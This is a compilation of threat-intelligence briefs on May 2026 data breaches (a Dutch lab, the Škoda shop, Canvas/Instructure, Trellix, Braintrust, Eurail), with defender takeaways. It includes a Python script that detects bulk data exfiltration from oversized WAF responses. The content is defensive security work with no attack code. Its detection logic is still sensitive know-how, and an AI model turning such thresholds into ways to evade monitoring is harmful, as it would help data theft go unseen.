IGJ's two named failures are foundational rather than technical: (1) no independent audit of the laboratory's information security had ever been performed, and (2) the organisation had not periodically assessed its processing risks, leaving it unable to determine which controls were necessary. The July 2025 breach — Computable's prior reporting attributes it to the Nova ransomware group — exposed approximately 941,000 patients' personal and medical records, including cervical-cancer screening results processed for the population-screening programme Bevolkingsonderzoek Nederland (Computable, 2026-05-13). IGJ has no fining power and has demanded short-term independent NEN 7510 certification; Autoriteit Persoonsgegevens (Dutch DPA), whose GDPR enforcement carries fines, is running a parallel investigation. IGJ also signalled sector-wide enforcement intent by publicly calling for all healthcare providers to demonstrate independent certification — a leading indicator of broader inspection cadence.

For a Swiss SOC the parallel is direct: NEN 7510 is the regulatory analogue of the EPDG (Bundesgesetz über das elektronische Patientendossier) security profile, and the two specific failures — absence of third-party audit, absence of periodic risk assessment — are the same hygiene-baseline gaps Swiss healthcare providers face under cantonal supervision. The breach scale (941k records, mass-screening data) is the proximate consequence of those structural gaps; the operationally useful read for defenders is detection of NEN-7510-style baseline gaps via third-party assessment, not signature hunting.

Škoda Auto Deutschland online-shop breach exposes customer PII and password hashes; logging gap prevents exfiltration confirmation

From CTI Daily Brief — 2026-05-12 · published 2026-05-12

Škoda Auto Deutschland GmbH disclosed on 2026-05-11 that an unauthorised actor exploited a vulnerability in the standard shop-software platform underlying its German online-retail store, accessing customer names, postal addresses, email addresses, telephone numbers, order history, account data and password hashes (Škoda Auto Deutschland — Sicherheitsvorfall Škoda Shop; SecurityWeek, 2026-05-11). Credit-card data was not exposed — payment processing is delegated to external PSPs and never stored in the shop database. Škoda's own monitoring detected the intrusion; the shop was taken offline, the underlying vulnerability patched, and external forensics retained. The disclosure flags one notable operational shortfall in the company's own framing: insufficient logging coverage prevents investigators from determining definitively whether the accessed data was actually exfiltrated, so customers must be treated as if it was. Škoda Auto a.s. is a VW Group subsidiary headquartered in Mladá Boleslav (Czech Republic); the German operating company's notification reached the competent EU supervisory authority within the GDPR Article 33 72-hour window. No threat actor has been attributed.

Defender takeaway: The exfiltration-uncertainty pattern this announcement makes public — "we know they read the database; we cannot prove they copied it" — is the dominant blind spot in EU e-commerce / customer-portal architectures whose security stack stops at the WAF and forgets about application-tier or database-tier query auditing. Concrete hardening: enable verbose query logging on the back-end DB for read-traffic anomalies (volume spikes per session, atypical filter cardinality), capture and retain HTTP response sizes at the WAF for n-times-baseline analytics, and forward both into the SIEM with retention measured in months rather than days. Downstream risk: the affected customer count and password-hash algorithm have not been disclosed in either cited source; defenders should treat any leaked password-hash dataset as plaintext-recoverable on a quarter-or-shorter horizon (GPU cracking yield against unknown-algorithm hashes is non-zero) and add Škoda customer email addresses to credential-stuffing watchlists at federated O365 / Google Workspace tenants for the next quarter.
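
The n-times-baseline response-size analytics proposed above, as an added example over constructed WAF access-log lines; this is not code from the brief or from Škoda. It builds a per-endpoint median from a baseline window, flags responses larger than N times that median, and rolls the flagged bytes up per session so a bulk read shows up as one incident. The log format, the endpoint templating and the multiplier are assumptions.

```python
"""n-times-baseline response-size analytics over constructed WAF access-log lines.

Per-endpoint median response size from a baseline window; flag responses
larger than N times that median; aggregate flagged bytes per session.
Log format, endpoint templating and N are assumptions for this example.
"""
import re
from collections import defaultdict
from statistics import median

N_TIMES = 10.0            # assumed multiplier over the endpoint median
MIN_BASELINE_SAMPLES = 3  # assumed; endpoints with less history are not scored

LINE_RE = re.compile(
    r"^(?P<ts>\S+) sess=(?P<sess>\S+) ip=(?P<ip>\S+) (?P<method>[A-Z]+) "
    r"(?P<path>\S+) (?P<status>\d{3}) (?P<bytes>\d+)$")

BASELINE_LOG = """\
2026-05-01T09:00:01Z sess=s01 ip=198.51.100.10 GET /api/orders?id=1001 200 1820
2026-05-01T09:00:05Z sess=s02 ip=198.51.100.11 GET /api/orders?id=1002 200 1790
2026-05-01T09:01:10Z sess=s03 ip=198.51.100.12 GET /api/orders?id=1003 200 1905
2026-05-01T09:02:00Z sess=s04 ip=198.51.100.13 GET /api/orders?id=1004 200 1850
2026-05-01T09:02:30Z sess=s01 ip=198.51.100.10 GET /api/account 200 940
2026-05-01T09:03:00Z sess=s02 ip=198.51.100.11 GET /api/account 200 960
2026-05-01T09:03:20Z sess=s03 ip=198.51.100.12 GET /api/account 200 955
"""

INCIDENT_LOG = """\
2026-05-09T02:11:00Z sess=x99 ip=203.0.113.7 GET /api/orders?id=2001 200 1800
2026-05-09T02:11:01Z sess=x99 ip=203.0.113.7 GET /api/orders?id=2002 200 48213000
2026-05-09T02:11:09Z sess=x99 ip=203.0.113.7 GET /api/account 200 9300500
2026-05-09T02:12:00Z sess=s07 ip=198.51.100.20 GET /api/orders?id=1010 200 1830
"""


def endpoint_key(method, path):
    """Collapse query strings and numeric path segments so sizes are compared like with like."""
    path = path.split("?", 1)[0]
    path = re.sub(r"/\d+(?=/|$)", "/{id}", path)
    return f"{method} {path}"


def parse_log(text):
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed lines are skipped rather than aborting the run
        d = m.groupdict()
        d["bytes"] = int(d["bytes"])
        d["endpoint"] = endpoint_key(d["method"], d["path"])
        rows.append(d)
    return rows


def build_baseline(rows):
    """Median response size per endpoint over successful (2xx) responses."""
    sizes = defaultdict(list)
    for r in rows:
        if r["status"].startswith("2"):
            sizes[r["endpoint"]].append(r["bytes"])
    return {ep: median(v) for ep, v in sizes.items() if len(v) >= MIN_BASELINE_SAMPLES}


def flag_oversized(rows, baseline, n=N_TIMES):
    """Per response: bytes > n x endpoint median. Returns (session, endpoint, bytes, ratio)."""
    hits = []
    for r in rows:
        base = baseline.get(r["endpoint"])
        if base and r["bytes"] > n * base:
            hits.append((r["sess"], r["endpoint"], r["bytes"], round(r["bytes"] / base, 1)))
    return hits


def sessions_by_flagged_bytes(hits):
    """Roll flagged responses up per session, largest first."""
    totals = defaultdict(int)
    for sess, _, nbytes, _ in hits:
        totals[sess] += nbytes
    return sorted(totals.items(), key=lambda kv: kv[1], reverse=True)


if __name__ == "__main__":
    base = build_baseline(parse_log(BASELINE_LOG))
    hits = flag_oversized(parse_log(INCIDENT_LOG), base)
    for h in hits:
        print("oversized response:", h)
    print("sessions by flagged bytes:", sessions_by_flagged_bytes(hits))
```

The median rather than the mean is deliberate: a handful of legitimately large exports in the baseline window would otherwise drag the threshold up and hide the very sessions being hunted. Endpoints whose normal response size is itself highly variable (search, reports) need a per-endpoint multiplier or a percentile baseline instead of one global N; the structure above makes that a one-line change in `build_baseline`.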

Canvas / Instructure breach — five-day arc from first claim to seven Dutch universities executing emergency disconnects

From CTI Weekly Summary — 2026-W19 (May 04 – May 10, 2026) · published 2026-05-11

Canvas / Instructure is the cleanest example of a campaign chain that accumulated meaningfully different state every day of 2026-W19, and the one a SOC manager carries into Monday morning with an extortion deadline two days out. Day-by-day:

  • 2026-05-06 — Instructure confirmed names, email addresses, student ID numbers, and user-to-user messages accessed; detected API-tool disruption ~2026-04-30; revoked privileged credentials and access tokens; passwords / financial data / government IDs out of scope; ShinyHunters claimed 275 M records across ~9,000 institutions including EU and APAC (BleepingComputer, 2026-05-04 · TechCrunch, 2026-05-05 · SecurityWeek, 2026-05-04 · daily 2026-05-06).
  • 2026-05-07 — individual universities (University of Nevada Reno, University of Pennsylvania ~300,000+ users) began notifying students and staff directly (University of Nevada Reno president message, 2026-05-06 · daily 2026-05-07 UPDATE).
  • 2026-05-08 — SURF (Dutch NREN) confirmed 44 Dutch institutions among victims; attacker posted portal defacements; 2026-05-12 extortion deadline set; Canvas taken offline for emergency patching on 2026-05-07 (NL Times — Canvas hack: student data from 44 Dutch universities and schools taken · The Next Web — largest education data breach in history · daily 2026-05-08 UPDATE).
  • 2026-05-09 — three major UK universities (Oxford, Cambridge, Liverpool — Liverpool notified ICO under GDPR Article 33) issued public statements; UNL confirmed 44 Dutch member institutions; 3 GB sample dump on 2026-05-07 contained course IDs, student emails, assignment metadata, grade records across four UK institutions; Instructure stated the breach vector was a compromised integration service account for a third-party LTI tool provider (not Canvas core infrastructure). The ShinyHunters / WorldLeaks operator-family attribution and the specific extortion-amount figure carried in the daily UPDATE trace to sources not re-fetched at weekly composition time; readers should consult the daily UPDATE for the citation chain (daily 2026-05-09 UPDATE).
  • 2026-05-10 — ShinyHunters posted a second intrusion notice on 2026-05-08 asserting Canvas retained unpatched vulnerabilities permitting re-entry despite the May 8 patches; Instructure confirmed the second breach, rotated application keys, increased monitoring, and required API-client re-authorisation; seven Dutch universities (VU Amsterdam, University of Amsterdam, Erasmus Rotterdam, Tilburg, Eindhoven TU/e, Maastricht, Twente) executed emergency Canvas disconnections on/before 2026-05-09; Dutch DPA (Autoriteit Persoonsgegevens) received an incident report from VU Amsterdam (Techzine EU, 2026-05-08 · DutchNews.nl, 2026-05-08 · daily 2026-05-10 UPDATE).

State at week-end: 2026-05-12 extortion deadline is Tuesday (two days out); no ransom paid as of 2026-05-09 06:00 UTC; if the second-intrusion claim verifies, Instructure's remediation was incomplete and the data-release threat is materially more credible. European universities running Canvas should treat credential-stuffing risk on stolen student / staff emails as active; audit third-party LTI integrations and revoke service accounts for unused integrations; watch for follow-on phishing campaigns referencing course content. GDPR Article 33/34 notification clocks run from the date Instructure provided scope confirmation to the institution.

Trellix source code repository breach — vendor confirmed, scope undisclosed, supply-chain integrity question open

From CTI Weekly Summary — 2026-W19 (May 04 – May 10, 2026) · published 2026-05-11

Trellix, a major endpoint-security / XDR vendor serving enterprise and government customers globally, confirmed on 2026-05-04 that an unauthorised party accessed a portion of its internal source code repository. The company engaged external forensic specialists and notified law enforcement; Trellix stated no evidence was found that its product code-release or distribution pipeline was affected and no evidence the accessed code was exploited or altered. The initial access vector, duration of access, scope of repositories affected, and customer data impact have not been disclosed (BleepingComputer, 2026-05-04 · The Hacker News, 2026-05-04 · daily 2026-05-06). Defender takeaway: organisations running Trellix endpoint or XDR products should maintain elevated scrutiny on Trellix software updates until the forensic investigation publicly concludes; the supply-chain integrity question — could the accessed code be re-used by an attacker for bug discovery or implant tailoring? — remains unresolved.

Braintrust AI evaluation platform AWS account breach — multi-tenant LLM-provider keys and SaaS credentials at risk; mandatory key rotation across customer base

From CTI Daily Brief — 2026-05-10 · published 2026-05-10

Braintrust, a US-based AI evaluation and observability platform, confirmed on 2026-05-06 that an attacker accessed one of its AWS accounts on 2026-05-04 (TechCrunch, 2026-05-06 · SecurityWeek, 2026-05-08). The compromised account contained organisation-level API keys customers use to connect to upstream LLM providers (OpenAI, Anthropic, Azure OpenAI). SecurityWeek separately notes that customers commonly federate access from Braintrust into Box, Cloudflare, Dropbox, Notion, Ramp, and Stripe, framing those as adjacent SaaS providers whose credentials warrant the same audit posture; the Braintrust statement itself does not enumerate exposed third-party credentials. Braintrust locked the account, audited related infrastructure, rotated internal secrets, and instructed every customer to rotate organisation-level AI provider credentials regardless of whether their specific keys were confirmed exposed. One customer was confirmed compromised and three others reported anomalous AI usage spikes consistent with credential abuse during the post-incident review. No specific Swiss/EU customer impact was identified in available sources at this run's window close.

The incident class is architecturally significant for European public-sector AI pilots: AI-evaluation and observability platforms aggregate API credentials for many LLM providers per customer organisation, so a single SaaS-tier compromise propagates into a multi-provider credential event for every downstream tenant. The same risk profile applies to AI gateways (LiteLLM, see § 4 / § 6 KEV deadline), agent-evaluation harnesses, prompt-rule-based observability, and AI prompt-management platforms.

Defender takeaway: Inventory which AI-tooling SaaS vendors hold organisation-level upstream-provider keys; require per-environment scoping (dev / staging / prod) and short TTLs; require provider-side anomaly alerts for unusual call-volume or geographic-origin shifts; treat any 2026-05-04 → 2026-05-06 audit-log gap on Braintrust as potentially related to this incident, even when keys were not labelled as confirmed exposed.

Eurail breach: 308 777 travellers notified three months after December 2025 compromise; Dutch DPA and EDPS open reviews

From CTI Daily Brief — 2026-05-08 · published 2026-05-08

Eurail began issuing breach notifications to 308 777 customers in late April 2026, revealing that an attacker accessed personal data — including passport numbers, IBANs, and DiscoverEU pass details — in a December 2025 incident. The three-month gap between discovery and notification is under review by the Autoriteit Persoonsgegevens (Dutch DPA) and the European Data Protection Supervisor (EDPS), which holds jurisdiction over EU institutional data processing. GDPR Article 33 requires supervisory authority notification within 72 hours of awareness of a breach. The exposed dataset covers travellers from EU member states who registered DiscoverEU passes; Swiss nationals who applied through bilateral arrangement may also be affected. Affected individuals should monitor for identity fraud and, where banking regulations permit, consider IBAN replacement.